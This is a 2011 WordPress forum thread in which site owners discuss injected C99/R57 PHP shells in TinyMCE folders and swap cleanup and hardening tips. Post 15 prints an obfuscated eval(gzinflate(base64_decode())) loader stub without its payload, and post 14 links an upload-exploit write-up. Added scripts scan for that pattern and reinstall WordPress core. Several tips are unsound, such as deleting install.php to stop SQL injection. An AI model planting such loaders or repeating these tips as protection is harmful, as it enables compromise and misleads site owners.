
Beware of SQL Injection / XSS

Discussion in 'Wordpress' started by denaya, Jul 12, 2011.

  1. denaya

    denaya Super Hero

    Joined:
    Aug 13, 2010
    Messages:
    1,381
    Likes Received:
    172
    One of my blogs got hit too. Checking its log, it pointed to wp-includes, where there were several foreign PHP files that are not among the standard WordPress files.

    After looking into it, it really was what it seemed: injected files. In my blog's case it was C99.

    Just for info, several of my blogs on Hostgator show the same indications; some were hit but not yet to the point of being "HACKED".

    Go ahead and check:

    Code:
    /wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img
    
    or 
    
    /wp-includes/js/tinymce/themes/advanced/skins
    There are several folders in here; go into the img directory, and if there is a .php file there just delete it, it is not part of WordPress.
    
    Install plugins
    - wp-firewall
    - Block Bad Queries
    - Security Scan
    - Take your pick ...

    Example from the error log
    Hope this helps
     
    Last edited: Jul 12, 2011
  2. yusrijon

    yusrijon Super Hero

    Joined:
    Jul 11, 2011
    Messages:
    1,268
    Likes Received:
    30
    Location:
    pabasko - by pass
    thanks4sharedotcom, boss.
    So if there is a PHP file in the img folder,
    it means our site has been hacked, boss?
     
  3. denaya

    denaya Super Hero

    Joined:
    Aug 13, 2010
    Messages:
    1,381
    Likes Received:
    172
    I don't know for sure, mas; it's just that the IMG folder doesn't have any PHP files, that's the standard. If you're curious, just open the file in Notepad and look at its contents.

    Even better, open the error log in the file manager.
    Usually if there are EVAL errors and the like, that's an indication it was hit too, even if not yet hacked.

    On my blog it happened to use the C99 script; if you're curious just google C99Shell or R57.

    Taking precautions doesn't hurt :)
     
  4. JuraganHosting

    JuraganHosting Hero

    Joined:
    Dec 11, 2010
    Messages:
    650
    Likes Received:
    20
    Location:
    www.mantaphosting.com
    nice info, bro
    but that kind of thing is all the same, bro
    better to rename wp-login.php ..hehehe
    so the hacker is frustrated: already inside but can't find the wp login ..hahahaha
     
  5. ahmadm

    ahmadm Super Hero

    Joined:
    Jul 13, 2010
    Messages:
    1,032
    Likes Received:
    36
    Location:
    Bekasi Timoer
    If you want to prevent SQL injection the way is quite easy, bro: we just delete the install.php file in the wp-admin folder after doing a fresh WordPress installation. Remember, I'm only saying this prevents it.

    Here I'm adding the list of security plugins I use, besides the list above:

    - Login LockDown
    - Secure WordPress
    - WP Firewall 2 (not the WP Firewall one)
     
  6. ifeytea

    ifeytea Ads.id Fan

    Joined:
    Dec 6, 2010
    Messages:
    186
    Likes Received:
    4
    Location:
    Kamp.adsense, Ds.Keyboard, Kec.Monitor, Jawa Barat
    When someone slips in an AdSense script, which folder or file is it usually in? Because mine has one slipped in. On the blog it shows up in the footer.
    On wp-login it sits in the middle, blocking us from entering the username. In wp-admin it blocks us from writing the post title. If I hadn't thought about it, I'd surely have click-frauded it. Now I just leave it, since that blog has minimal traffic and is nearly abandoned.
     
  7. hernawanjr

    hernawanjr Super Hero

    Joined:
    May 31, 2010
    Messages:
    857
    Likes Received:
    32
    Location:
    di hatimu
    Which WP version are you using, bro? The hole has to be found,, anyone know???
     
  8. denaya

    denaya Super Hero

    Joined:
    Aug 13, 2010
    Messages:
    1,381
    Likes Received:
    172
    Footer.php; it can also be in functions ..

    I'm adding a picture to make it clear .. this is in the folder
    /wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img

    (screenshot not reproduced)
     
    Last edited: Jul 12, 2011
  9. ifeytea

    ifeytea Ads.id Fan

    Joined:
    Dec 6, 2010
    Messages:
    186
    Likes Received:
    4
    Location:
    Kamp.adsense, Ds.Keyboard, Kec.Monitor, Jawa Barat
    thanks bro, but I looked in image and there are no php files. In the footer there's no AdSense script. In functions there's none either. It looks like this:

    (attachments 9271, 9272, 9273 not reproduced)
     
  10. heri83

    heri83 Super Hero

    Joined:
    Jul 31, 2008
    Messages:
    2,328
    Likes Received:
    88
    Location:
    jogja-magelang
    so is this the solution to my problem here http://www.adsense-id.com/forums/showthread.php/85086-Please-Help-Me..!-Theme-blog-satu-hosting-kena-inject-kode-anehh.. , bro?
     
  11. teguhaditya

    teguhaditya Super Hero

    Joined:
    Jan 23, 2008
    Messages:
    7,503
    Likes Received:
    1,418
    Location:
    _ ▂ ▃ ▅ ▆ █
    Just a tip, rather than opening the files in wp-includes, or maybe wp-admin, one by one:

    Code:
    1. back up your files and database first
    2. check the entire contents of wp-content (including themes and plugins), in case something slipped in there
    3. once wp-content is clean and there are no suspicious signs, it's time to move on to the other directories
    4. download the latest WordPress version http://wordpress.org/latest.tar.gz
    5. delete the wp-admin and wp-includes on the website, replace them with the latest WP.
    6. test whether the website runs properly with everything.
    7. if there are errors, try restoring from the backup; if it all goes smoothly, the WP reinstall succeeded.
    
    For an earlier WP version, after all the wp-admin and wp-content files have been replaced, still go to domainname.ext/wp-admin/upgrade.php
    to upgrade from the previous version to the current one
     
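The reinstall steps above as a single shell function. This is an added example, not the poster's code: it assumes the site root and an already-downloaded release tarball (the URL from step 4) as its two arguments, backs the files up first (the database dump is done separately), and replaces only wp-admin and wp-includes, leaving wp-content and wp-config.php in place.

```shell
#!/bin/sh
# Added example: the reinstall procedure from the post above as one function.
# Usage: reinstall_core /path/to/site /path/to/latest.tar.gz
# Assumes the tarball is a WordPress release (step 4) that unpacks to a wordpress/ directory.
reinstall_core() {
  site=$1
  tarball=$2
  stamp=$(date +%Y%m%d%H%M%S)
  backup="$site/../wp-files-backup-$stamp.tar.gz"

  # Step 1: back up every file first (dump the database separately, e.g. with mysqldump).
  tar -czf "$backup" -C "$site" . || return 1

  # Unpack the clean release into a scratch directory and sanity-check its layout.
  work=$(mktemp -d)
  tar -xzf "$tarball" -C "$work" || return 1
  [ -d "$work/wordpress/wp-admin" ] && [ -d "$work/wordpress/wp-includes" ] || return 1

  # Step 5: remove the on-site wp-admin and wp-includes and replace them with clean copies.
  # wp-content (step 2 is a manual review), wp-config.php and .htaccess are not touched.
  rm -rf "$site/wp-admin" "$site/wp-includes"
  cp -R "$work/wordpress/wp-admin" "$work/wordpress/wp-includes" "$site/" || return 1
  rm -rf "$work"

  # Steps 6-7 are the manual test; print the backup path so it can be restored if needed.
  echo "$backup"
}
```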
  12. serampangan

    serampangan Super Hero

    Joined:
    Nov 4, 2010
    Messages:
    983
    Likes Received:
    96
    Location:
    Sukoharjo-Tangerang-Sungailiat
    Damn, someone planted a PHP shell; mine got hit yesterday too.
    Ugh.
    So now don't use the standard wp_ table prefix, change it to something like wp548456_.
    It can minimize SQL injection attacks.
    The rest I don't know.
    hehehehehe
    You really do have to be careful.
     
  13. anisku11

    anisku11 Super Hero

    Joined:
    Jun 28, 2011
    Messages:
    1,627
    Likes Received:
    179
    Location:
    Semarang
    hmm, so we need to be careful
    hackers are running rampant
    :omg:
     
  14. retyohet

    retyohet Ads.id Pro

    Joined:
    Feb 28, 2010
    Messages:
    292
    Likes Received:
    12
    Location:
    irc.byroe.net
    Umm, I think it's your TinyMCE plugin that's vulnerable, TS; check out hxxp://urduhack.blogspot.com/2011/05/tinymce-ajaxfilemanager-upload.html
    Maybe it can be restricted in the .htaccess so the Perl-based bug-scanner bots can't "get in" :)
     
  15. faqih

    faqih Newbie

    Joined:
    Jun 2, 2006
    Messages:
    29
    Likes Received:
    0
    Right, boss, the TinyMCE in my Ucan Post plugin also contained strange files, same as your blogs, guys and gals ..... for those who have been hit: check all your PHP files.

    ---------- Post added at 10:37 PM ---------- Previous post was at 10:26 PM ----------

    Adding a sample, bro:
    PHP:
    <?php /*f5290f31e9c3a739c23b505a32cc7ea1*/ eval(gzinflate(base64_decode('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')));?>
     
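The two checks this thread describes, a PHP file sitting in the TinyMCE img/skins directories (post 1) and the eval(gzinflate(base64_decode(...))) loader (post 15), as a small shell scan. This is an added example, not code from any poster; the sample tree it builds is constructed so both checks can be tried offline, and any hit is something to review by hand against a clean release rather than delete blindly.

```shell
#!/bin/sh
# Added example: scan a WordPress tree for the two symptoms described in this thread.
# make_sample_tree builds a constructed, throwaway tree so the checks can be tried offline.
make_sample_tree() {
  root=$(mktemp -d)
  img="$root/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img"
  mkdir -p "$img" "$root/wp-includes/js/tinymce/themes/advanced/skins/default" \
           "$root/wp-content/themes/demo"
  : > "$img/buttons.gif"                                  # legitimate skin asset
  printf '<?php echo "planted"; ?>\n' > "$img/c99.php"    # constructed stand-in for a dropped file
  printf '<?php /*constructed*/ eval(gzinflate(base64_decode("AAAA"))); ?>\n' \
    > "$root/wp-content/themes/demo/footer.php"           # constructed obfuscated loader
  printf '<?php get_header(); ?>\n' > "$root/wp-content/themes/demo/index.php"
  echo "$root"
}

# Check 1: PHP files inside img/ or skins/ directories, which should hold only images and CSS.
php_in_asset_dirs() {
  find "$1" -type f -name '*.php' \( -path '*/img/*' -o -path '*/skins/*' \) | sort
}

# Check 2: PHP files that decode and eval() a packed payload (the pattern shown in post 15).
obfuscated_loaders() {
  find "$1" -type f -name '*.php' -exec grep -lE \
    'eval[[:space:]]*\([[:space:]]*(gzinflate|gzuncompress|str_rot13|base64_decode)[[:space:]]*\(' {} + | sort
}

# Report both lists; each hit is a file to inspect and compare with the official release.
scan_wordpress() {
  echo "== PHP files in asset directories =="; php_in_asset_dirs "$1"
  echo "== PHP files with eval()-ed packed payloads =="; obfuscated_loaders "$1"
}
```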
  16. TheNext

    TheNext Super Hero

    Joined:
    Mar 1, 2011
    Messages:
    2,899
    Likes Received:
    211
    Location:
    Ruang Pikiran
    thanks for the addition, bro
     
  17. kowek

    kowek Hero

    Joined:
    Nov 25, 2009
    Messages:
    629
    Likes Received:
    15
    Ouch, dangerous too. WP security seems to be getting messier and messier. Got one hit yesterday. Time to secure the sites one by one. :D
     
  18. radiusdanu

    radiusdanu Super Hero

    Joined:
    Jan 30, 2011
    Messages:
    1,245
    Likes Received:
    278
    Location:
    ASP
    yep, will do
    BTW the one above is my siggy :omg:
    awesome.... :lol: :lol:
     
  19. Yahoo!

    Yahoo! Super Hero

    Joined:
    Jul 7, 2011
    Messages:
    835
    Likes Received:
    32
    great share :D
     
  20. andhi

    andhi Hosting Indonesia

    Joined:
    Jun 3, 2011
    Messages:
    225
    Likes Received:
    23
    Location:
    Cirebon, Jakarta
    just finished putting protection on all the blogs :omg:
     
